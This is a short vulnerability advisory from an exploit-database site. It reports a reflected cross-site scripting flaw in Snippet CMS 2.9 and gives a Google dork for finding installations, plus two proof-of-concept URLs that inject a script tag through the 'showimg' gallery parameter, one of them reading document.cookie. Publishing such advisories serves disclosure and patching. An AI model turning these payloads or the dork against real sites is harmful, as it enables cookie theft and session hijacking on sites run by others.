Snippet CMS 2.9 Cross Site Scripting

2011.09.27
Credit: CoBRa_21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: \"Powered by Snippet CMS\"

Exploit Title: Snippet CMS v2.9 XSS Vulnerability Google Dork: "Powered by Snippet CMS" Date: 23.09.2011 Author: CoBRa_21 Version: 2.9 Tested on: Unix Server ------------------------------------------------------------------------------------------------------- Exploits http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(document.cookie)</script> http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(/CoBRa_21/)</script> ------------------------------------------------------------------------------------------------------- Thanks e-banka.org & cyber-warrior.org


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top